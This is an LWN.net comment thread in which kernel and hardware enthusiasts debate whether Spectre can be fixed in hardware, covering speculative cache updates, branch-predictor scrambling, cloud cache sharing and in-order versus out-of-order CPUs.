Avoiding retpolines with static calls

Posted Mar 29, 2020 18:30 UTC (Sun) by NYKevin (subscriber, #129325)
In reply to: Avoiding retpolines with static calls by anton
Parent article: Avoiding retpolines with static calls

> (hopefully a short one curtailed by the introduction of properly fixed hardware).

As I currently understand things, this is at best optimistic.

Spectre is not a simple hardware flaw that you can fix by rearranging a few transistors. It is a design flaw in speculative execution itself. Spectre has been endemic to every general-purpose microprocessor that has been manufactured in the past twenty or more years (and probably most special-purpose microprocessors too). To "fix" it, you would have to completely redesign, not just one or two architectures, but the entire concept of what a modern microprocessor looks like.

I am open to being corrected, of course. It's entirely possible that some manufacturers have gone down that "redesign everything from the ground up" road that I described, or perhaps they found a simpler path forward. But my current understanding is that workarounds, usually at higher layers of the system, are all we've got right now and for the foreseeable future.

Avoiding retpolines with static calls

Posted Mar 29, 2020 18:47 UTC (Sun) by Cyberax (✭ supporter ✭, #52523) [Link] (9 responses)

Speculative (mis-)execution is not a problem in itself, it's the fact that it may cause observable side effects. So one avenue of attack on this problem is removing the side effects.

Avoiding retpolines with static calls

Posted Mar 29, 2020 20:56 UTC (Sun) by anton (subscriber, #25547) [Link] (6 responses)

Yes. E.g., do not update the caches from speculative loads. Instead, keep the load results in a private buffer and only update the caches if the loads become non-speculative, or when they are committed.

Another avenue is to make it hard to train the predictor for a Spectre v2 exploit, e.g., by scrambling the input and/or the output of the predictor with a per-thread secret that changes now and then. You can combine this avenue with the other one.

Avoiding retpolines with static calls

Posted Mar 29, 2020 21:01 UTC (Sun) by Cyberax (✭ supporter ✭, #52523) [Link]

I've spoken with hardware people about it a couple of years ago and they had some ideas like separate speculative caches, that can be referred only from speculative contexts. Or adding artificial access delay to cache lines added by from speculative contexts. I'm sure other ideas will come in future.

Avoiding retpolines with static calls

Posted Mar 30, 2020 1:52 UTC (Mon) by NYKevin (subscriber, #129325) [Link] (4 responses)

I'm not convinced that is sufficient. If there is any statistical relationship between any part of the processor's observable behavior and any data that any higher-level code might possibly consider a "secret," then you can perform a statistical analysis of that behavior to recover that secret, with arbitrarily good statistical confidence (depending on the available data). This is basic information theory. Adding noise at random parts of the processor will force the attacker to gather more data, but if the system under attack belongs to a cloud provider, then that's not an obstacle (because renting out processors for extended periods is their entire business model).

The problem is that performance is a form of observable behavior. So you have to completely disentangle performance variations from every piece of data in main memory, cache, and registers, or else you have to exhaustively prove that the code under execution has access to that data, in every security model that the system cares about. The latter would extend to, for example, determining that the code under execution lives inside of a Javascript sandbox and should not be allowed to access the state of the rest of the web browser. I don't see how the processor can be reasonably expected to do that, so we're back to the first option: The processor's performance must not vary in response to any data at all. But then you can't have a branch predictor.

I would really like someone to convince me that I'm wrong, because if true, this is rather terrifying. But as far as I can see, there is no catch-all mitigation for this problem.

Avoiding retpolines with static calls

Posted Mar 30, 2020 2:32 UTC (Mon) by Cyberax (✭ supporter ✭, #52523) [Link] (2 responses)

> because renting out processors for extended periods is their entire business model
Pretty much all major cloud computing providers assign CPUs exclusively to customers, except maybe for the cheapest offerings (like T2/T3 instances on AWS).

Avoiding retpolines with static calls

Posted Apr 2, 2020 8:35 UTC (Thu) by wahern (subscriber, #37304) [Link] (1 responses)

By CPUs do you mean cores or packages? Multiple cores on a single package share cache (e.g. L3) and are vulnerable to cross-core, cross-VM leaks. (See https://www.usenix.org/system/files/conference/usenixsecu....) I don't know how much of a headache are cross-package attacks that exploit cache coherency protocols, but there are such attacks in the literature, which I'd keep in mind for high-value assets absent details from AWS.

I'd be surprised if the bulk of instances were package isolated. The Xeon Platinum 8175M used for M5 instances has 24 cores per package, 48 threads, and therefore 48 vCPUs. AFAIU, EC2 doesn't share cores, but a vCPU is still the equivalent of a logical SMT-based core, so any instance type using less than 47 vCPUs would be leaving at least an entire core unused. AWS offers 2-, 8-, 16-, 32-, 48-, 64-, and 96-vCPU M5 instances. I'd bet a large number and probably a majority of customers are utilizing 2- to 32-vCPU instances, that they invariably share packages, and thus share L3 cache. And I'd also bet that 64-vCPU instances share one of their packages with other instances.

Avoiding retpolines with static calls

Posted Apr 2, 2020 16:37 UTC (Thu) by Cyberax (✭ supporter ✭, #52523) [Link]

I'm pretty sure AWS splits nodes in such way that instances don't share cache.

> I'd keep in mind for high-value assets absent details from AWS.
All major cloud providers also have dedicated instances that won't be shared across customers. In case of AWS you can even run your own T2/T3 instances on top of the dedicated hardware nodes.

Avoiding retpolines with static calls

Posted Mar 30, 2020 9:50 UTC (Mon) by anton (subscriber, #25547) [Link]

It's not clear what attack scenario you have in mind. Can you give an example?

If you refer to the scrambling of the branch predictor inputs and outputs , note that the secret changes regularly (with an interval designed such that only a small part of the secret can be extracted).

Concerning attacks from within the same thread (as in JavaScript engines), assuming good-enough scrambling, the attacker cannot predict which other branches a branch is aliased with in the branch predictor, and also cannot get the prediction to branch to the gadget the attacker wants to be speculatively executed.

Concerning observable behaviour, lots of things are theoretically observable (e.g., through power consumption or electromagnetic emissions), and have been used practically on other components (e.g., emissions from CRTs or screen cables to watch what you are watching), but the danger is that you get into a "the sky is falling" mode of thinking that does not differentiate how realistically possible an attack is. I have seen hardware and software providers blamed for waiting for the demonstration of an attack before they start acting, but OTOH, if they acted on any far-fetched theoretical weakness (not even attack scenario) that somebody worries about, they would not have a product.

Avoiding retpolines with static calls

Posted Apr 2, 2020 9:32 UTC (Thu) by ras (subscriber, #33059) [Link] (1 responses)

Uhmmm, in this case the side effect they are exploiting is the speed up of the program. That happens to the very side effect caches were added for. Any mitigation will reduce that highly desirable side effect, and thus reduce the usefulness of cache's in general.

The more general problem is privilege separation. This is just a case of lower privilege code being able to deduct what higher privilege code left in its cache. I wonder how long it will be before someone figures out how to exploit spectre via a javascript JIT, or wasm. The only solution is hardware protecting the browser memory from the javascript, but the hardware doesn't provide anything lightweight enough. If we did have something lightweight enough micro kernels would be more viable.

Avoiding retpolines with static calls

Posted Apr 2, 2020 12:04 UTC (Thu) by anton (subscriber, #25547) [Link]

The question is how much a proper hardware mitigation costs compared to the current mitigations. So what are the costs of not updating caches on speculative memory accesses?

If the access becomes non-speculative (the vast majority of cases in most code), the caches will be updated a number of cycles later. The performance impact of that is minimal.

If the access is on a mispredicted path, the caches will not be updated. If the line is then not accessed before it would be evicted, this is a win. If the line is accessed, we incur the cost of another access to an outer level or main memory. A somewhat common case is when you have a short if, and then a load after it has ended; if the if is mispredicted, and the load misses the cache, the speculative execution will first perform an outer access, and then it will be reexecuted on the corrected path and will perform the outer access again; the cost here is the smaller of the cache miss cost and the branch misprediction cost. And the combination is relatively rare.

Overall, not updating caches on speculative memory accesses reduces the usefulness of caches by very little, if at all (there are also cases where it increases the usefulness of caches).

A Spectre-based exploit using JavaScript has been published pretty early. No, MMU-style memory protection is not the only solution, Spectre-safe hardware as outlined above would also be a solution.

Avoiding retpolines with static calls

Posted Apr 2, 2020 11:58 UTC (Thu) by davecb (subscriber, #1574) [Link] (9 responses)

re: Spectre has been endemic to every general-purpose microprocessor that has been manufactured in the past twenty or more years

I suspect that the cpu family used in the T5 from (the late, lamented) Sun Microsystems dodged this: it's claim to fame was running other, non-blocked code whenever a thread was blocked on a memory fetch, as described in https://en.wikipedia.org/wiki/UltraSPARC_T1

Avoiding retpolines with static calls

Posted Apr 2, 2020 12:27 UTC (Thu) by anton (subscriber, #25547) [Link] (8 responses)

Generally, in-order implementations are not affected, and existing out-of-order implementations are affected; not because it's not possible to make Spectre-immune OoO implementations, but because they did not think about how to do it when they designed these CPUs (Spectre was discovered later).

UltraSPARC T1-SPARC T3 are in-order, but SPARC T4, T5, M7, M8 are OoO. Performing other threads on a cache miss does not protect against Spectre: The cache or other microarchitectural state can still be updated from a speculative load.

Recent in-order CPUs include Cortex A53 and A55, and Bonnell, the first generation of Intel's Atom line.

Avoiding retpolines with static calls

Posted Apr 2, 2020 12:47 UTC (Thu) by davecb (subscriber, #1574) [Link]

Many thanks!

Interestingly, the kind of side-channel attack that Spectre and friends are variants of were studied back in the mainframe days, well before anyone got around to inventing them (;-))

--dave

Avoiding retpolines with static calls

Posted Apr 2, 2020 13:27 UTC (Thu) by farnz (subscriber, #17727) [Link] (6 responses)

Note, though, that even in-order CPUs can be affected. The core of Spectre family attacks is that the CPU speculatively executes code that changes micro-architectural state, and thus any CPU with speculation can be affected. There exist demonstrations that suggest that the Cortex A53, for example, is partially affected by Spectre, but the resulting side channel is too limited to be practical with the currently known exploits.

In theory, even a branch predictor can carry enough state to be attacked!

Avoiding retpolines with static calls

Posted Apr 2, 2020 15:12 UTC (Thu) by davecb (subscriber, #1574) [Link]

Yes: in an experiment at Sun, we found branch prediction could cause differing numbers of cache-line fills. Logically you could use it to signal single bits, for a lowish-speed side channel.

Avoiding retpolines with static calls

Posted Apr 2, 2020 15:37 UTC (Thu) by anton (subscriber, #25547) [Link] (4 responses)

Yes, in-order CPUs perform branch prediction and use that to perform several stages of the pipeline of the first predicted instructions, but normally they do not do anything that depends on the result of one of the predicted instructions; they would need some kind of register renaming functionality for that, and if as a hardware designer you go there, you can just as well do a full OoO design.

A Spectre-style attack consists of a load of the secret, and some action that provides a side channel, with a data flow from the load to the action (otherwise you don't side-channel the secret). An OoO processor can do that, but an in-order processor as outlined above cannot AFAICS. If you can provide a reference to the A53 demonstration, I would be grateful.

Avoiding retpolines with static calls

Posted Apr 2, 2020 18:18 UTC (Thu) by farnz (subscriber, #17727) [Link] (1 responses)

Even something as apparently trivial as using the branch predictor to decide which instructions to fetch is enough to make a timing difference that Spectre-type exploits can predict. "All" you need to do is ensure that the branch predictor correctly predicts for a single value of the secret and mispredicts for all others (or vice-versa), and that I have a timer that lets me determine whether or not the branch predictor correctly predicted (made easier if I can control L1I$ contents), and I have a side-channel. Not a very good side channel, but enough that I can extract secrets slowly.

And there's no point having a branch predictor if you then insert a pipeline bubble that means that there's no timing difference between a correct prediction and a mispredict; it's that timing difference that creates the side-channel, though, so you need to somehow prevent the attacker from measuring a timing difference there to be completely Spectre-free.

The demonstration was something in-house, using exactly the components I've described above; it was a slow enough channel to be effectively useless, but it existed.

Avoiding retpolines with static calls

Posted Apr 3, 2020 7:59 UTC (Fri) by anton (subscriber, #25547) [Link]

Yes, the branch predictor can be used as the side channel; in a Spectre-type attack the action part would then be a branch.

But for a Spectre-type attack the branch predictor needs to be updated based on the speculatively loaded value. This does not happen in in-order processors (because the execution does not get that far), and it will not happen in a Spectre-resistant OoO CPU (e.g., by only updating the branch predictor based on committed branches).

Note that not all side-channel attacks are Spectre attacks. We can prevent some side channels through hardware design. E.g., there are Rowhammer-immune DRAMs; I also dimly remember some CPU-resource side channel (IIRC a limitation on the cache ports) that was present in one generation of Intel CPUs, but not in the next generation, which had more resources. Closing other side channels in the non-speculative case appears to be too expensive, e.g., cache and branch predictor side channels, as you explain.

There are established software mitigations for protecting critical secrets (branchless code, data-independent memory accesses for code that handles these secrets) such as encryption keys from non-Spectre/Meltdown side channels. But these do not help against Spectre, because Spectre can use all code in the process to extract the secret.

From your description, you read about a non-Spectre side-channel attack through the branch predictor of the A53.

Avoiding retpolines with static calls

Posted Apr 3, 2020 14:30 UTC (Fri) by excors (subscriber, #95769) [Link] (1 responses)

> A Spectre-style attack consists of a load of the secret, and some action that provides a side channel, with a data flow from the load to the action (otherwise you don't side-channel the secret). An OoO processor can do that, but an in-order processor as outlined above cannot AFAICS.

I don't see why an in-order processor couldn't do that, in principle. They're still going to do branch prediction, and speculatively push some instructions from the predicted target into the start of the pipeline. Once they detect a mispredict they'll flush the pipeline and start again with the correct target. As long as the flush happens before the mispredicted instructions reach a pipeline stage that writes to memory or to registers, that should be safe (ignoring Spectre). But if the mispredicted instructions read from a memory address that depends on a register (which may contain secret data), and the read modifies the TLB state or cache state, then it would be vulnerable to Spectre-like attacks.

(I'm thinking of an artificial case like "insecure_debug_mode = 0; int x = secret; if (insecure_debug_mode) x = array[x];", where mispredicting the 'if' means the very next instruction will leak the secret data via the cache. It doesn't need a long sequence of speculative instructions. That could be a case where the programmer has carefully analysed the expected code path to avoid data-dependent memory accesses etc so their code is safe from side-channels attacks according to the advertised behaviour of the processor, but the processor is speculatively executing instructions that the programmer did not expect to be executed, so I think that counts as a Spectre vulnerability. As I see it, the fundamental issue with Spectre is that it doesn't matter how careful you are about side-channels when writing code, because the processor can (speculatively) execute an arbitrarily different piece of code that is almost impossible for you to analyse.)

In practice, in-order processors seem to typically have short enough pipelines that the misprediction is detected within a few cycles, before the mispredicted instructions have got far enough through the pipeline to have any side effects. But that seems more by luck than by design, and maybe some aren't quite lucky enough. OoO processors aren't more dangerous because they're OoO, they're more dangerous because they typically have much longer pipelines and mispredicted instructions can progress far enough to have many side effects.

Avoiding retpolines with static calls

Posted Apr 3, 2020 16:10 UTC (Fri) by anton (subscriber, #25547) [Link]

So you are thinking about an architecturally visible (i.e., non-speculative) secret, and using speculation only for the side channel. One difference from the classical Spectre attacks is that, like for non-speculative side-channel attacks, software developers only need to inspect the code that deals with the secret and avoid such ifs there; but yes, it's an additional rule they have to observe in such code.

The length of the pipeline of an OoO processor is not the decisive factor. Unlike an in-order processor, speculatively executed instructions on an OoO do not just enter the pipeline, they produce results that other speculatively executed instructions can use as inputs. Essentially the in-order front end (instruction fetch and decoding) is decoupled from the in-order commit part (where the results become architecturally visible) by the OoO engine, and the front end can run far ahead (by hundreds of instructions and many cycles) of the commit part.